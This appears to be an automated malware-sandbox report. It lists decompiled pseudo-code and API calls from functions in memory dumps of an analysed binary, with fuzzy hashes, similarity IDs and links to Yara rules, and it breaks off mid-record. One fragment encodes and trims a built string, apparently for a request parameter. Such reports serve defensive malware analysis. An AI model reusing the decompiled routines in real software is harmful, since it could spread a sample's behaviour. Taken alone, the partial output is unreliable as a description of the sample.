				_t28 = E012B43A8(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E012B75F6(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E012B5601(_t34, _t41, _a8);
						E012B4AAB(_t41);
						_t42 = E012B756E(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E012B4AAB(_t36);
							_t36 = _t42;
						}
						_t43 = E012B26DD(_t36, _t33);
						if(_t43 != 0) {
							E012B4AAB(_t36);
							_t36 = _t43;
						}
					}
					E012B4AAB(_t28);
				}
				return _t36;
			}

0x012b1974
0x012b1977
0x012b1978
0x012b1980
0x012b1987
0x012b198e
0x012b1992
0x012b1998
0x012b199f
0x012b19a4
0x012b19b6
0x012b19ba
0x012b19be
0x012b19c4
0x012b19c9
0x012b19d9
0x012b19db
0x012b19f2
0x012b19f6
0x012b19f9
0x012b19fe
0x012b19fe
0x012b1a07
0x012b1a0b
0x012b1a0e
0x012b1a13
0x012b1a13
0x012b1a0b
0x012b1a16
0x012b1a16
0x012b1a21

APIs

Part of subcall function 012B43A8: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,012B198E,253D7325,00000000,00000000,74ECC740,?,?,012B4653,?), ref: 012B440F
Part of subcall function 012B43A8: sprintf.NTDLL ref: 012B4430

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,012B4653,?,052495B0), ref: 012B199F
lstrlen.KERNEL32(?,?,?,012B4653,?,052495B0), ref: 012B19A7

Part of subcall function 012B75F6: RtlAllocateHeap.NTDLL(00000000,00000000,012B4F70), ref: 012B7602

strcpy.NTDLL ref: 012B19BE
lstrcat.KERNEL32(00000000,?), ref: 012B19C9

Part of subcall function 012B5601: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,012B19D8,00000000,?,?,?,012B4653,?,052495B0), ref: 012B5618

Part of subcall function 012B4AAB: RtlFreeHeap.NTDLL(00000000,00000000,012B5012,00000000,?,?,00000000), ref: 012B4AB7

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,012B4653,?,052495B0), ref: 012B19E6

Part of subcall function 012B756E: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,012B19F2,00000000,?,?,012B4653,?,052495B0), ref: 012B7578
Part of subcall function 012B756E: _snprintf.NTDLL ref: 012B75D6

Strings

=, xrefs: 012B19E0

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 60566fbcdf7363713b94778b318ec8dd9508d78c7e383bc060df9b794fa173d7
Instruction ID: c43d94ebf4a934106d9dae55b2887fbd388601efb0e82e91adc76b6fa6479879
Opcode Fuzzy Hash: 60566fbcdf7363713b94778b318ec8dd9508d78c7e383bc060df9b794fa173d7
Instruction Fuzzy Hash: B811CA335215566B4711B7B8ACD8CFF3BAD9F967D03054016F705AB101DE34DD1287A4

Uniqueness

Uniqueness Score: -1.00%

Function 6ED4D4AB, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6ED4D196: _free.LIBCMT ref: 6ED4D1BB

_free.LIBCMT ref: 6ED4D4F9

Part of subcall function 6ED41434: HeapFree.KERNEL32(00000000,00000000,?,6ED4D1C0,?,00000000,?,?,?,6ED4D4C4,?,00000007,?,?,6ED4B43B,?), ref: 6ED4144A
Part of subcall function 6ED41434: GetLastError.KERNEL32(?,?,6ED4D1C0,?,00000000,?,?,?,6ED4D4C4,?,00000007,?,?,6ED4B43B,?,?), ref: 6ED4145C

_free.LIBCMT ref: 6ED4D504
_free.LIBCMT ref: 6ED4D50F
_free.LIBCMT ref: 6ED4D563
_free.LIBCMT ref: 6ED4D56E
_free.LIBCMT ref: 6ED4D579
_free.LIBCMT ref: 6ED4D584

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
Instruction ID: 91f782e401aa0fc40ea80c77c0b238a593083c44c15b10f1e53154ef40ee3d72
Opcode Fuzzy Hash: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
Instruction Fuzzy Hash: 9C112BB1A41B0CEAE620AFF0CC05FCB77ADAF24708F844D55E69DA6091DB75B518CA70

Uniqueness

Uniqueness Score: -1.00%

Function 6ED01C96, Relevance: 10.6, APIs: 7, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED01C9D
std::_Lockit::_Lockit.LIBCPMT ref: 6ED01CA7
int.LIBCPMT ref: 6ED01CBE

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

numpunct.LIBCPMT ref: 6ED01CE1
std::_Facet_Register.LIBCPMT ref: 6ED01CF8
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED01D18
Concurrency::cancel_current_task.LIBCPMT ref: 6ED01D25

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
String ID:
API String ID: 3064348918-0
Opcode ID: 2206e521056f459230f0269f3772a33f26dd472c6c66e5ab4bd7d5914c3ad655
Instruction ID: 209ec4e7a70248ff68c1fbe2e6be746ca15072b778cf5b3f53b2d0a20e5522d0
Opcode Fuzzy Hash: 2206e521056f459230f0269f3772a33f26dd472c6c66e5ab4bd7d5914c3ad655
Instruction Fuzzy Hash: 1811AC3190012A9BCB058FE4D944BEDB7B9AF8532CF284818D410AB2C0DF74D90A8BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED076A3, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED076AA
std::_Lockit::_Lockit.LIBCPMT ref: 6ED076B4
int.LIBCPMT ref: 6ED076CB

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

moneypunct.LIBCPMT ref: 6ED076EE
std::_Facet_Register.LIBCPMT ref: 6ED07705
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07725
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07732

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: 041ff6455c0835fd2a973ce38903d0b0227f93498b1e56b22412e75c0d9cb16f
Instruction ID: 882efe31c9e14b50911744f288b17f74b584d980c9b6a49c65b33255c562a0af
Opcode Fuzzy Hash: 041ff6455c0835fd2a973ce38903d0b0227f93498b1e56b22412e75c0d9cb16f
Instruction Fuzzy Hash: 6401AD3190051AABCB05DFE4C944AEDB7B9BF85368F290809D4116B3C1DB70DA068BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED0760E, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07615
std::_Lockit::_Lockit.LIBCPMT ref: 6ED0761F
int.LIBCPMT ref: 6ED07636

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

moneypunct.LIBCPMT ref: 6ED07659
std::_Facet_Register.LIBCPMT ref: 6ED07670
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07690
Concurrency::cancel_current_task.LIBCPMT ref: 6ED0769D

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: 86f68de0dc6a2e9cb6fdc9bd79358a3303ec69edd855b9ef2814a01b6e49d6ac
Instruction ID: cbd747db11b235df133cdc6be31bb78ae7bff91bb1fecd345a3030cf743673f1
Opcode Fuzzy Hash: 86f68de0dc6a2e9cb6fdc9bd79358a3303ec69edd855b9ef2814a01b6e49d6ac
Instruction Fuzzy Hash: 4501C03190051AAFCF45DFE4C994AED7779BF85328F290909D4116B3C0DF709A058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED077CD, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED077D4
std::_Lockit::_Lockit.LIBCPMT ref: 6ED077DE
int.LIBCPMT ref: 6ED077F5

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

moneypunct.LIBCPMT ref: 6ED07818
std::_Facet_Register.LIBCPMT ref: 6ED0782F
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED0784F
Concurrency::cancel_current_task.LIBCPMT ref: 6ED0785C

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: 62177e1da59e35e7d4d8d48bced17df2bd1d3ada145336b4656e47adf6b58ab6
Instruction ID: a3a52cabda7fbbaabd8209806ffa8a3395d4ec768264795bb80e1ed605317dc1
Opcode Fuzzy Hash: 62177e1da59e35e7d4d8d48bced17df2bd1d3ada145336b4656e47adf6b58ab6
Instruction Fuzzy Hash: C301C03590062AABCF05DFE0C945AED777ABF85728F180919D8206F2C0DF709A05CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED06FA7, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED06FAE
std::_Lockit::_Lockit.LIBCPMT ref: 6ED06FB8
int.LIBCPMT ref: 6ED06FCF

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

codecvt.LIBCPMT ref: 6ED06FF2
std::_Facet_Register.LIBCPMT ref: 6ED07009
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07029
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07036

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID:
API String ID: 2133458128-0
Opcode ID: 3bacffa86b603de58f5731db1fe75cc02dff181226217e381d0308412817b8ed
Instruction ID: 4b8cb69d57cc2452c9d061ee27270265a09c31b9f47b5b6828321692dc6052f2
Opcode Fuzzy Hash: 3bacffa86b603de58f5731db1fe75cc02dff181226217e381d0308412817b8ed
Instruction Fuzzy Hash: CA01803190451AABCF05DFE4C984AED7B7AAF85758F180909D4116B2C0DF71DA06CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED06F12, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED06F19
std::_Lockit::_Lockit.LIBCPMT ref: 6ED06F23
int.LIBCPMT ref: 6ED06F3A

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

codecvt.LIBCPMT ref: 6ED06F5D
std::_Facet_Register.LIBCPMT ref: 6ED06F74
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED06F94
Concurrency::cancel_current_task.LIBCPMT ref: 6ED06FA1

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID:
API String ID: 2133458128-0
Opcode ID: 0edc18c11e0b2bffe686682b91f63963e81594f6d01018cf88e1e313176fe633
Instruction ID: a86f50bde04f8d9b9404c9a9621baab124d1882e95fd3c6c445850a75dd07041
Opcode Fuzzy Hash: 0edc18c11e0b2bffe686682b91f63963e81594f6d01018cf88e1e313176fe633
Instruction Fuzzy Hash: 8801C431914516DFCF05CFE0C954AEDBB796F85328F180809E4256B3D0DF749D458B61

Uniqueness

Uniqueness Score: -1.00%

Function 6ED07738, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED0773F
std::_Lockit::_Lockit.LIBCPMT ref: 6ED07749
int.LIBCPMT ref: 6ED07760

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

moneypunct.LIBCPMT ref: 6ED07783
std::_Facet_Register.LIBCPMT ref: 6ED0779A
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED077BA
Concurrency::cancel_current_task.LIBCPMT ref: 6ED077C7

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: 2f646f6ce55e332e836ece67941288ed36c72a1e5d48d7d0eac432c4b1b13450
Instruction ID: 946f2117eb7a2729a5f4e6c0d69ca90ae2172f07cdfdfd290153647b905c108b
Opcode Fuzzy Hash: 2f646f6ce55e332e836ece67941288ed36c72a1e5d48d7d0eac432c4b1b13450
Instruction Fuzzy Hash: 1B01AD3590051AABCB0ADFE4C945AEDB77AAF85358F18081AD8106B2C0DF709E058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED01AD7, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED01ADE
std::_Lockit::_Lockit.LIBCPMT ref: 6ED01AE8
int.LIBCPMT ref: 6ED01AFF

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

ctype.LIBCPMT ref: 6ED01B22
std::_Facet_Register.LIBCPMT ref: 6ED01B39
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED01B59
Concurrency::cancel_current_task.LIBCPMT ref: 6ED01B66

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
String ID:
API String ID: 2958136301-0
Opcode ID: 09c00affa46bdbe032c1fe26e62ee9fa767aad443e446765ccef45526b251b70
Instruction ID: fb93dece336d212e5bff1c610265b93af1f59e4540455b27fbd1aa2e424a94bc
Opcode Fuzzy Hash: 09c00affa46bdbe032c1fe26e62ee9fa767aad443e446765ccef45526b251b70
Instruction Fuzzy Hash: B701C031D0461A9FCF05CFE4CA84AED777AAF5136CF280809D4106B2C0EF709A4A8BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED07290, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07297
std::_Lockit::_Lockit.LIBCPMT ref: 6ED072A1
int.LIBCPMT ref: 6ED072B8

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

messages.LIBCPMT ref: 6ED072DB
std::_Facet_Register.LIBCPMT ref: 6ED072F2
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07312
Concurrency::cancel_current_task.LIBCPMT ref: 6ED0731F

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
String ID:
API String ID: 958335874-0
Opcode ID: 5b499b6317ea9893048f725223d60e0988f00f2a3b12ec6f68e986dcaabd7155
Instruction ID: 97b98d973e6352f2b6325846e1de46911bbce2c7330d0cffe2c314230d384d89
Opcode Fuzzy Hash: 5b499b6317ea9893048f725223d60e0988f00f2a3b12ec6f68e986dcaabd7155
Instruction Fuzzy Hash: 4001C03190451AAFCF05EFE0C954AED777AAF81328F280809D8116B2C0DF709A05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED07AB6, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07ABD
std::_Lockit::_Lockit.LIBCPMT ref: 6ED07AC7
int.LIBCPMT ref: 6ED07ADE

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

numpunct.LIBCPMT ref: 6ED07B01
std::_Facet_Register.LIBCPMT ref: 6ED07B18
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07B38
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07B45

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
String ID:
API String ID: 3064348918-0
Opcode ID: bf2976225bd7dc5ac44d59e03b96267edf0bab52f08d9c2c429538ddc514c253
Instruction ID: 76755edd54e3bae2457863a322d969d5afdae216bbae10c4f824dd494840a710
Opcode Fuzzy Hash: bf2976225bd7dc5ac44d59e03b96267edf0bab52f08d9c2c429538ddc514c253
Instruction Fuzzy Hash: B201C07190061AAFCF05EFE4C984AEE777AAF85328F280909D4106B2C0DF70DA05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED01A42, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED01A49
std::_Lockit::_Lockit.LIBCPMT ref: 6ED01A53
int.LIBCPMT ref: 6ED01A6A

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

codecvt.LIBCPMT ref: 6ED01A8D
std::_Facet_Register.LIBCPMT ref: 6ED01AA4
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED01AC4
Concurrency::cancel_current_task.LIBCPMT ref: 6ED01AD1

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID:
API String ID: 2133458128-0
Opcode ID: 00447fb4e993f6f436972847874a539597dacbbe5c4390e7e8e4c4c9d2240e7f
Instruction ID: e35fc424491f00aa2b3c2a3929eb1cb6747bb490bbf873745a04a138193dfdcc
Opcode Fuzzy Hash: 00447fb4e993f6f436972847874a539597dacbbe5c4390e7e8e4c4c9d2240e7f
Instruction Fuzzy Hash: E401C03190461ADFCF05CFE4C984AED77B9AF8532CF280809D4116B3C0DF709A4A8BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED07B4B, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07B52
std::_Lockit::_Lockit.LIBCPMT ref: 6ED07B5C
int.LIBCPMT ref: 6ED07B73

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

numpunct.LIBCPMT ref: 6ED07B96
std::_Facet_Register.LIBCPMT ref: 6ED07BAD
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07BCD
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07BDA

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
String ID:
API String ID: 3064348918-0
Opcode ID: d9d3322fd0f16e6351116c63299aa87f12c9f4e5e9e3adafe2cbc5df6aa34efc
Instruction ID: 822d0a28ebc362916ab17640d453e6fc712c4d329ec59ff1ad3fee5f20e9fc98
Opcode Fuzzy Hash: d9d3322fd0f16e6351116c63299aa87f12c9f4e5e9e3adafe2cbc5df6aa34efc
Instruction Fuzzy Hash: 1E01803190051AAFCF05DFE4C955AEDB77AAF85328F188919E4116B2C0EF74DE05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED07325, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED0732C
std::_Lockit::_Lockit.LIBCPMT ref: 6ED07336
int.LIBCPMT ref: 6ED0734D

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

messages.LIBCPMT ref: 6ED07370
std::_Facet_Register.LIBCPMT ref: 6ED07387
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED073A7
Concurrency::cancel_current_task.LIBCPMT ref: 6ED073B4

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
String ID:
API String ID: 958335874-0
Opcode ID: 0552655cb49b7ed3ff46c6552246d4023a9767416334fcd422891e65bef5b0b4
Instruction ID: b781fd9ec89954f1fd0d86010cb1cf496aa0c13464ab1aab9a0c76f3d169d3f8
Opcode Fuzzy Hash: 0552655cb49b7ed3ff46c6552246d4023a9767416334fcd422891e65bef5b0b4
Instruction Fuzzy Hash: 5401C031A0051AAFCF05EFE4C945AEDB779BF85318F18080AD8206B3C0DF70DA058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED070D1, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED070D8
std::_Lockit::_Lockit.LIBCPMT ref: 6ED070E2
int.LIBCPMT ref: 6ED070F9

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

collate.LIBCPMT ref: 6ED0711C
std::_Facet_Register.LIBCPMT ref: 6ED07133
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07153
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07160

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
String ID:
API String ID: 1767075461-0
Opcode ID: 2c43ccfde3f58b2dc6974af69c3a259832db161cb88bc05908d0994110e95b69
Instruction ID: 790cae872160baf982fea5551dd2117feee5924fe2967340416f3e6e25512245
Opcode Fuzzy Hash: 2c43ccfde3f58b2dc6974af69c3a259832db161cb88bc05908d0994110e95b69
Instruction Fuzzy Hash: FC01803190462AEFCF05DFE4C945AEE777ABF85768F180919D4106B3C0DF709A058BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6ED0703C, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07043
std::_Lockit::_Lockit.LIBCPMT ref: 6ED0704D
int.LIBCPMT ref: 6ED07064

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

collate.LIBCPMT ref: 6ED07087
std::_Facet_Register.LIBCPMT ref: 6ED0709E
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED070BE
Concurrency::cancel_current_task.LIBCPMT ref: 6ED070CB

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
String ID:
API String ID: 1767075461-0
Opcode ID: aa9123236118108e350f52b06736c0798fed58d1b5eb79d87a0f1fdd197befa7
Instruction ID: 581c4981a389f504a888b981df2fa164a27c8fb7026a0472c04682c841d2cdc4
Opcode Fuzzy Hash: aa9123236118108e350f52b06736c0798fed58d1b5eb79d87a0f1fdd197befa7
Instruction Fuzzy Hash: 2301927190051A9FCF05DFE4C995AEEB77AAF85328F280909D4116B3C0DF70DA098BB2

Uniqueness

Uniqueness Score: -1.00%

Function 6ED071FB, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07202
std::_Lockit::_Lockit.LIBCPMT ref: 6ED0720C
int.LIBCPMT ref: 6ED07223

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

ctype.LIBCPMT ref: 6ED07246
std::_Facet_Register.LIBCPMT ref: 6ED0725D
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED0727D
Concurrency::cancel_current_task.LIBCPMT ref: 6ED0728A

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
String ID:
API String ID: 2958136301-0
Opcode ID: 1aea2c0c6533e981040bbfbc7f7c57b807cf0dd1323357d26c9d8d23c88b41bb
Instruction ID: 324f4ed1622f1a37ec42d3f16a0612ea8b130139f8e0d734978f6f518d910820
Opcode Fuzzy Hash: 1aea2c0c6533e981040bbfbc7f7c57b807cf0dd1323357d26c9d8d23c88b41bb
Instruction Fuzzy Hash: 1601803190052A9FCF05DFE4DA54AED777ABF95328F184919E4116B2C0EF70DA06CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED07166, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED0716D
std::_Lockit::_Lockit.LIBCPMT ref: 6ED07177
int.LIBCPMT ref: 6ED0718E

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

ctype.LIBCPMT ref: 6ED071B1
std::_Facet_Register.LIBCPMT ref: 6ED071C8
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED071E8
Concurrency::cancel_current_task.LIBCPMT ref: 6ED071F5

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
String ID:
API String ID: 2958136301-0
Opcode ID: bf3ecf9ceee56c323eafaff9c6d8448917ac1fefb02f3f505a170b6538347c74
Instruction ID: 19ead14b528dedd25a183171097229eadfb7531f9afd37f2e528ffa614c2f389
Opcode Fuzzy Hash: bf3ecf9ceee56c323eafaff9c6d8448917ac1fefb02f3f505a170b6538347c74
